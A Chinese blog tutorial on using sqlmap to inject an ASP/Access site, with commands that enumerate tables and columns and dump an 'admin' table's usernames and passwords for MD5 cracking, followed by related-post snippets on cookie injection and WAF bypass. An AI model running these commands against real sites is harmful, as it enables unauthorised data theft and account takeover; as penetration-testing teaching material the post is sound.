Sqlmap基本(一)之Access数据库的注入

最新推荐文章于 2023-03-16 15:12:51 发布
最新推荐文章于 2023-03-16 15:12:51 发布
阅读量577 收藏 3
点赞数
分类专栏: 渗透 文章标签: 网络安全 sqlmap的使用 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43822735/article/details/102884425
版权

Sqlmap的基本使用(一)
Access数据库的注入

测试注入点:http://aaa.com/view.asp?id=1
基础指令 -u指令:在后面添加url
例如:sqlmap.py –u “http://aaa.com/view.asp?id=1” 通常加上双引号,避免多指令或者url过于复杂而引发的错误。

扩展:SQLMap的默认输出路径是在 C:/Users/用户名/.sqlmap/output/下的,一般在扫描网站后自动创建,如果不在也可以用以下命令自己改变默认的文件输出路径C:\Python27\sqlmap>sqlmap.py -u “http://aaa.com” --output-dir=C:\Python27\sqlmap\abcabc

第一步:当测试注入点后,测试成功。假设已知数据库是access数据库,接着要查询数据库中的表,命令如下:sqlmap.py –u “http://aaa.com/view.asp?id=1” --tables
在这里插入图片描述
注1:当需要判定选项时,直接回车的选项就是当前选项中大写字母为默认选项
注2:每当需要进行数据库注入下一步操作时,在参数中需要定义上一次的指令
tables:列表名 columns:列字段 dump:下载数据
第二步:查询到表明后(如上图)开始查询字:sqlmap.py –u “http://aaa.com/view.asp?id=1” --columns -T “admin” 查询到字段名后
第三步:查询字段的数据sqlmap.py –u “http://aaa.com/view.asp?id=1” - - dump –C “username,passwd” –T “admin”
第四步:查询到用户名和密码后 用MD5解密即可

GIT_CH
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmapaccess_access注入篇+sqlmap
weixin_28911533的博客
12-24 1177
access数据库的来历,我就不说了,因为我懒的记,就算记了感觉上也没大多用处,只要记得数据库的结构就行了。先是表名,然后是列名,再者就是数据,我发个实际的图吧,大概就是这么一个结构。下面,开始说下未过滤的SQL代码,说是SQL代码,其实应该说是asp代码,因为,很多access数据库都是和asp这个脚本语言相连的,关于asp这个脚本语言细节,想深入了解的可以百度下,毕竟搜索引擎也是一个很好的老师...
Access数据库注入sqlmap工具注入
天威一号
11-12 283
文档发给
sqlmap之(三)----Access注入实战
热门推荐
fendo
02-27 1万+
(1) 猜解是否能注入 sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific f
SQLmap————2、Access注入
Fly_鹏程万里
05-04 460
1、判断给定的URL是否能注入Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?id=1Linux下:sqlmap  –u    http://www.xxx.com/sql/test.asp?id=12、猜解数据库名称Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?i...
sqlmap注入Access实例
0ffs3t
02-14 6431
FROM:暗组   最近学习SQL注入攻击,首先从Access+ASP开始,以前没有发现Linux下有什么针对Access注入工具,后来才知道原来 SQLMap可以 什么是SQL注入攻击? SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员 也越来越多。但是由于程序员的水平及经验也参差不齐,相
kali linux 下sqlmap注入ACCESS数据库.doc
03-04
Kali Linux 下 SQLmap 注入 ACCESS 数据库 Kali Linux 作为一个基于 Debian 的 Linux 发行版,广泛应用于渗透测试和安全评估中,而 SQLmap 则是一个开源的自动化 SQL 注入工具,旨在检测和利用 SQL 注入漏洞。下面...
整理比较全的Access SQL注入参考
09-14
1. SQLMap:一个开源的 SQL 注入工具,支持 Access 数据库。 2. Burp Suite:一个综合的 Web 应用程序安全测试工具,支持 Access 数据库Access SQL 注入的案例 1. 获取数据库版本:使用 UNION SELECT 语句来...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
SQLmap注入工具
09-20
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
SQLMAP注入使用
05-13
sqlmap可以多平台运行,windows,linux下都可以进行access,mysql,mssql等数据库注入,更重要的是sqlmap是一款开源的工具。 SQLMAP注入命令详解: 1. python SQLMAP.py -u "xxxxxxx.com"【查询链接是否存在...
Sqlmap常用命令总结及注入实战(Access、mysql)
上善若水~的博客
05-14 1046
sqlmap常用命令总结: 注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行) 1#、注入六连: 1.   sqlmap -u  “http://www.xx.com?id=x”    【查询是否存在注入点 –dbs         【检测站点包含哪些数据库 3.     --curre
SQL注入攻击之SQLMap渗透测试
CTO成长之路——Rosanu
07-30 3588
准备工具:SQLMap、FireFox插件Tamper Data SQLMap进行渗透测试 FireFox插件Tamper Data用于获取Post参数数据和Cookie值 示例: SQLMap POST方法:sqlmap.py -u "http://www.url.com" --data "param1=1&param2=2"  --cookie="PHPSESSID=57p5g7f32
sqlmap注入Access
weixin_33737774的博客
07-18 126
什么是SQL注入***? SQL注入***是***对数据库进行***的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员 也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合 法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的 ...
SQLMAP注入Access数据库
weixin_34176694的博客
04-02 368
今天偶遇一Access数据库 1.首先尝试是否存在注入点,and1=1,and 1=2,发现返回信息不一样 2.使用sqlmap脱裤,发现时Access数据库,不能提权, 3.那就直接暴库吧,sqlmap.py -uhttp://www.XXX.cc/common.asp?id=2%20and%201=2 --tables 期间因为线程太慢了,去配置文件改了一下线程 ...
sqlmap进行SQL注入
最新发布
weixin_45095113的博客
03-16 526
sqlmap跑SQL注入
python自动化测试工具 waf_SQLmap绕waf实现自动测试
weixin_39958248的博客
11-24 283
前言Sqlmap是python写的一个开源测试工具,因支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access 等多个份额较多的数据库,且功能强悍被众多安全测试者所使用,在现实的测试环境中,有很多测试者遇到注入都习惯使用Sqlmap去进行测试,假如Sqlmap无法跑出来,就不进行深入测试了,本文笔者将拿一个真实遇到的小例...
一文了解SQLMap
allintao的博客
02-27 2560
SQLMap是一款开源的渗透测试工具,可用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器 的权限等操作 SQLMap支持的数据库有:MySQL、Oracle、Microsoft SQL Server、Microsoft Access,IBM DB2、 SQLite等主流数据库 检测类型:union联合查询注入、布尔盲注、时间盲注、报错注入、堆叠注入
使用sqlmap 代替access 注入中转
eT48_Sec
03-14 1601
背景:测试站点是ASP的程序,经测试 shownews.asp?id=61存在注入 GET方法 shownews.asp?id=61 and 4>1 返回警告 改成POST方法,仍然出现警告 最后,测试cookie注入,如下图,在控制台提交document.cookie="id="+escape("61 and 4>1"),新增cookie项id,然后再次访问shownews.asp
详解新手如何使用sqlmapAccess数据库进行注入攻击
1匹黑马
03-06 4487
步骤1:发现是否存在注入 首先我们打开火狐浏览器,进入目标网站,随意点击几个连接,发现网站后方都是以id参数为结尾的 看见以id为结尾的,我们第一时间应该想到的就是注入,首先我们输入 and 1=1,发现网站有防sql注入系统 不要慌,问题不大!打不过我还躲不过?这时候我们尝试进行大小写绕过(绕过WAF的方式与思路很多,在这里就不一一列举了) 现在没毛病了8铁汁 我们接着输入 aNd 1=2,...
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值